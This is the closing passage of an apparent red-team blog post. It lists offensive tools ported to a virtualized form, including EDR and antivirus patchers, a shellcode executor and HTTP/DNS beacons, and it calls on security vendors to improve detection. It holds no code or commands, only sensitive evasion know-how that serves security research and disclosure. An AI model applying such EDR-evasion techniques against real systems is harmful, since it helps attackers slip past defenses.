  • Multiple lateral movement modules;
  • Shellcode and bytecode executor;
  • Antivirus and EDR patchers;
  • HTTP(s) and DNS beacons;
  • Tools querying Active Directory information.

Porting of additional tools is taking place, and we expect to have virtualized versions of most tools used in a Red Team exercise in the near future.

Looking Forward

The motivations for this blog post are two-fold. Firstly, we wanted to share what we think is exciting research with the community. We learned what we know from openly shared blog posts and articles, and want to give back to the community. We use all the knowledge we gained to improve the security of our customers through offensive security testing, and we hope that this blog post will help and inspire others to do the same.

Secondly, although security products have advanced tremendously, we want to show that there is still room for improvement. We have noticed a tendency to “slap an EDR on it and call it a day” in certain niches of the security industry. Although that might work for some time, because a modern EDR truly adds a strong layer of security, the door is still open for attackers to bypass these products. As the landscape evolves and general cyber security knowledge increases, the skill and sophistication of cyber criminal elements will rise. Consider this blog post, and the technique explained within, a warning and a call to action. We hope security vendors will think about how they can detect these types of payloads, and how they can improve their products to stay ahead of the curve, as they are right now.

References

  1. https://www.openwall.com/lists/oss-security/2024/03/29/4
  2. https://en.wikipedia.org/wiki/Polymorphic_engine
  3. https://en.wikipedia.org/wiki/Executable-space_protection
  4. https://en.wikipedia.org/wiki/Metamorphic_code
  5. https://vmpsoft.com/
  6. https://en.wikipedia.org/wiki/Opcode
  7. https://en.wikipedia.org/wiki/Bytecode
  8. https://en.wikipedia.org/wiki/Disassembler#Length_disassembler
  9. https://en.wikipedia.org/wiki/Streaming_SIMD_Extensions
  10. https://en.wikipedia.org/wiki/Advanced_Vector_Extensions
  11. https://www.felixcloutier.com/x86/bt
  12. https://github.com/icedland/iced
  13. https://en.wikipedia.org/wiki/Position-independent_code
  14. https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_main.htm
  15. https://learn.microsoft.com/en-us/cpp/cpp/stdcall
  16. https://devblogs.microsoft.com/oldnewthing/20160623-00/?p=93735
  17. https://www.felixcloutier.com/x86/lea
  18. https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_functions.htm#bof_pack
  19. https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutine
  20. https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetloadimagenotifyroutine
  21. https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/event-tracing-for-windows–etw-